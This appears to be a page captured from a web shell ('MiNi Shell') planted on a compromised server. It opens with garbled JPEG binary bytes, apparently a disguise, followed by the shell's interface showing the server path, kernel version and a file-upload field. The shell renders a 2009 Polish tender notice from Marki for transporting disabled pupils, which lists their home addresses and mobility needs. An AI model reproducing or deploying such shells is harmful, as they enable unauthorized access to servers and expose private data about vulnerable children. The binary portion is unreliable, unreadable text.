JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090729/258916-N-2009.html

<p class="kh_header"><b>Marki: Świadczenie  usług  transportowych  dla  uczniów niepełnosprawnych zamieszkałych w   Markach  w roku szkolnym 2009/2010 z podziałem na 2 zadania  polegające na zapewnieniu transportu i opieki w czasie przewozu na drodze dom-szkoła-dom</b><br>
<b>Numer ogłoszenia: 258916 - 2009; data zamieszczenia: 29.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi  Placówek Oświatowych w Markach , ul. Klonowa 7, 05-270 Marki, woj. mazowieckie, tel. 022 771 37 34, faks 022 771 35 86.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.marki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie  usług  transportowych  dla  uczniów niepełnosprawnych zamieszkałych w   Markach  w roku szkolnym 2009/2010 z podziałem na 2 zadania  polegające na zapewnieniu transportu i opieki w czasie przewozu na drodze dom-szkoła-dom.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług transportowych dla uczniów niepełnosprawnych zamieszkałych w Markach w roku szkolnym 2009/2010 z podziałem na 2 zadania  polegające na zapewnieniu transportu  i opieki w czasie przewozu na drodze dom-szkoła-dom  następującymi trasami:
        Zadanie nr 1 
a)Marki ul. Legionowa 42 - Warszawskie Koło Polskiego Stowarzyszenia na rzecz Osób z Upośledzeniem Umysłowym w Warszawie ul. Grochowska 259 a  
(1 uczeń chodzący);
b)Marki ul. Mała 25 - Zespół Szkół Nr 5 w Warszawie ul. Szczawnicka (1 uczeń chodzący);
c)Marki ul. Dąbrowskiego 2 - Zasadnicza Szkoła Zawodowa Specjalna Nr 54 w Warszawie ul. Długa 9 (1 uczeń chodzący);
d)Marki ul. Okólna 25 - Wyższa Szkoła Finansów i Zarządzania w Warszawie ul. Pawia 55  (1 uczeń chodzący z balkonikiem);
e)Marki ul. 11-go listopada 8a, ul. Równa 1,  ul. Wołodyjowskiego 37a  - Szkoła Podstawowa Nr 5 w Warszawie  ul. Kordeckiego 54 (3 uczniów chodzących);
        Zadanie nr 2 
a)Marki  ul. Rzemieślnicza 7, ul. Grunwaldzka 7/3 - Liceum Ogólnokształcące w Zielonce ul. Inżynierska 1  (2 uczniów na wózkach);
b)Marki ul. Lisa Kuli 98 - Gimnazjum w Zielonce ul. Łukasińskiego 1/3 (1 uczeń na wózku)
c)Marki ul. Lisa Kuli 73b m 14, ul. Lisa Kuli 73b m 16, ul. Mickiewicza 26 m 103, ul. Wiśniowa 7 - Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym w Wołominie, Filia przy ul. 1-go Maja 36 (4 uczniów na wózkach);
d)Marki ul. Traugutta 8, ul. Kresowa 2, ul. Lisa Kuli 30, ul. Pogodna 5 - Szkoła Podstawowa w Wołominie ul. Miła 22 ( 1 uczeń na wózku, 3 uczniów chodzących).  
2.  Uczniowie mają być dowożeni do szkoły zgodnie z ustalonym planem lekcji , w takim czasie aby możliwe było punktualne rozpoczęcie  przez nie zajęć szkolnych  i zabierani po ich zakończeniu, bez zbędnego oczekiwania. Przed przystąpieniem do  realizacji usługi Wykonawca ustali optymalny rozkład jazdy dla poszczególnych  kursów mając na uwadze jak najkrótszy czas przebywania dziecka w podróży. Rozkład jazdy odnośnie wszystkich kursów Wykonawca  przekaże do Zespołu Obsługi Placówek Oświatowych   osobie wyznaczonej do nadzoru wykonania usługi.
3.   Samochody wożące uczniów muszą być ubezpieczone oraz dostosowane technicznie do potrzeb  niepełnosprawnych uczniów z możliwością posadzenia ucznia w foteliku  samochodowym dostosowanym do wieku i wzrostu dziecka lub przewiezienia go na wózku  inwalidzkim  zgodnie z obowiązującymi w tym zakresie przepisami. 
4.  Oprócz kierowcy w każdym samochodzie musi  jechać z uczniami przygotowany  do tej pracy opiekun zatrudniony przez Wykonawcę . W czasie transportu na trasie dom-szkoła-dom uczeń musi mieć zapewnioną opiekę ze strony opiekuna polegającą na pomocy w dojściu z domu do samochodu,  wejściu do pojazdu, opiece w czasie transportu w samochodzie, pomocy przy wychodzeniu z pojazdu, pomocy w dojściu  do szkoły  w  odpowiednim stroju i pomocy w rozebraniu się w szkole. W drodze powrotnej do domu opiekun odbiera dziecko ze   szkoły i zapewnia odpowiednią jak wyżej opiekę do momentu  przekazania dziecka rodzicom lub opiekunom domowym.
5.  Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania  usług przewozu uczniów. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna spowodowana działalnością  Wykonawcy.
 6.  Wykonawca zamówienia musi realizować je zgodnie z przepisami prawa, a w szczególnościw zgodzie z ustawą z dnia 6 września 2001 r. o transporcie  drogowym (tj. Dz. U. z 2007 r., Nr 125, poz. 874) oraz ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (t.j.   Dz.U. z 2005 r. Nr 108, poz. 908 z późn. zm.)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od wykonawców wniesienia wadium w wysokości 1 000 zł na każde zadanie, na które Wykonawca składa ofertę.
2.Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu 
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:  90 8015 0004 0190 8596 2021 0002
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy złożą ważną i odpowiednią ofertę oraz:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
2.posiadają niezbędną wiedzę  oraz dysponują potencjałem technicznym i osobami  i  zdolnymi do wykonania zamówienia,
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy.
5.oświadczą, że spełniają warunki określone w art. 22 ustawy.
    Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wypełniony i podpisany formularz oferty (wzór w załączniku nr 1 do SIWZ).
2.Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy oraz, że nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 w/w ustawy (wzór w załączniku nr 2 do SIWZ).
3.Zaakceptowany projekt umowy ( wzór w załączniku nr 3 do SIWZ)
4.Zgodnie z art. 26 ust. 2 należy załączyć dokumenty wymienione w § 1 ust. 1 pkt.1 i 2, ust. 2 pkt. 2,5,6 oraz ust. 3 pkt. 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane. (Dz.U. Nr 87 z dnia 24 maja 2006 r. poz. 605.):
a.licencja  na wykonywanie krajowego transportu drogowego osób;
b.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
c.wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również 
wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia 
działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie;
d.wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia wraz z dokumentami stwierdzającymi posiadane uprawnienia;
e.oświadczenie, że osoby występujące w roli opiekunów posiadają przygotowanie 
do wykonywania podstawowych czynności pielęgnacyjno-opiekuńczych wobec 
dzieci w czasie przewozu oraz przeszkolenie w zakresie udzielania pierwszej
pomocy- wg wzoru stanowiącego załącznik  nr 4 do SIWZ;
f.wykaz niezbędnych do wykonania zamówienia pojazdów samochodowych 
przystosowanych do przewozu osób niepełnosprawnych (wzór w załączniku nr 5
do SIWZ) uzupełniony o dowody rejestracyjne tych pojazdów, aktualne polisy
obowiązkowego ubezpieczenia pojazdów OC/NW oraz  aktualne zaświadczenia o 
przeprowadzonych badaniach technicznych pojazdów z adnotacją, że pojazdy
odpowiadają dodatkowym warunkom technicznym przewidzianym dla pojazdów
przystosowanych do przewozu osób niepełnosprawnych;
g.polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od 
odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na    kwotę minimum 50 000 zł.
 Zgodnie z § 4 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. 
 w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. ( Dz.U. Nr 87 z dnia 24 maja 2006r. poz. 605) w/w dokumenty Wykonawca może złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę lub pełnomocnego przedstawiciela Wykonawcy.
5. Zgodnie z art. 23 ust.1 ustawy Prawo zamówień publicznych  Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. W w/w przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku Wykonawców ubiegających się  wspólnie o udzielenie zamówienia, dokumenty wymienione w  punkcie 2, oraz 4 a,b,g winien dołączyć każdy podmiot występujący wspólnie.
Jeżeli Wykonawca nie złoży wymaganych dokumentów i oświadczeń lub nie spełni 
jednego, bądź więcej warunków, Wykonawca zostanie wykluczony z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych. Zgodnie z art. 24 ust. 4 ustawy ofertę Wykonawcy  wykluczonego uznaje się za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.marki.pl  w Biuletynie Informacji Publicznej ZOPO w Markach (zakładka Biuletyny Jednostek Samorz.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Placówek Oświatowych w Markach
05-270 Marki, ul. Klonowa 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2009 godzina 11:00, miejsce: Zespół Obsługi Placówek Oświatowych w Markach
05-270 Marki, ul. Klonowa 7, pokój nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług transportowych dla uczniów niepełnosprawnych zamieszkałych w Markach
w roku szkolnym 2009/2010 - Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług transportowych dla uczniów niepełnosprawnych zamieszkałych w Markach w roku szkolnym 2009/2010  polegające na zapewnieniu transportu   i    opieki w czasie przewozu na drodze dom-szkoła-dom  następującymi trasami:
        Zadanie nr 1 
a)	Marki ul. Legionowa 42 - Warszawskie Koło Polskiego Stowarzyszenia na rzecz Osób z Upośledzeniem Umysłowym w Warszawie ul. Grochowska 259 a  
(1 uczeń chodzący);
b)	Marki ul. Mała 25 - Zespół Szkół Nr 5 w Warszawie ul. Szczawnicka (1 uczeń chodzący);
c)	Marki ul. Dąbrowskiego 2 - Zasadnicza Szkoła Zawodowa Specjalna Nr 54 w Warszawie ul. Długa 9 (1 uczeń chodzący);
d)	Marki ul. Okólna 25 - Wyższa Szkoła Finansów i Zarządzania w Warszawie ul. Pawia 55  (1 uczeń chodzący z balkonikiem);
e)	Marki ul. 11-go listopada 8a, ul. Równa 1,  ul. Wołodyjowskiego 37a  - Szkoła Podstawowa Nr 5 w Warszawie  ul. Kordeckiego 54 (3 uczniów chodzących);.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie  usług  transportowych  dla  uczniów niepełnosprawnych zamieszkałych w   Markach  w roku szkolnym 2009/2010 - Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług transportowych dla uczniów niepełnosprawnych zamieszkałych w Markach w roku szkolnym 2009/2010   polegające na zapewnieniu transportu    i opieki w czasie przewozu na drodze dom-szkoła-dom  następującymi trasami:
        Zadanie nr 2
a)Marki  ul. Rzemieślnicza 7, ul. Grunwaldzka 7/3 - Liceum Ogólnokształcące w Zielonce ul. Inżynierska 1  (2 uczniów na wózkach);
b)Marki ul. Lisa Kuli 98 - Gimnazjum w Zielonce ul. Łukasińskiego 1/3 (1 uczeń na wózku);
c)Marki ul. Lisa Kuli 73b m 14, ul. Lisa Kuli 73b m 16, ul. Mickiewicza 26 m 103, ul. Wiśniowa 7 - Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym w Wołominie, Filia przy ul. 1-go Maja 36 (4 uczniów na wózkach);
d)Marki ul. Traugutta 8, ul. Kresowa 2, ul. Lisa Kuli 30, ul. Pogodna 5 - Szkoła Podstawowa w Wołominie ul. Miła 22 ( 1 uczeń na wózku, 3 uczniów chodzących)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com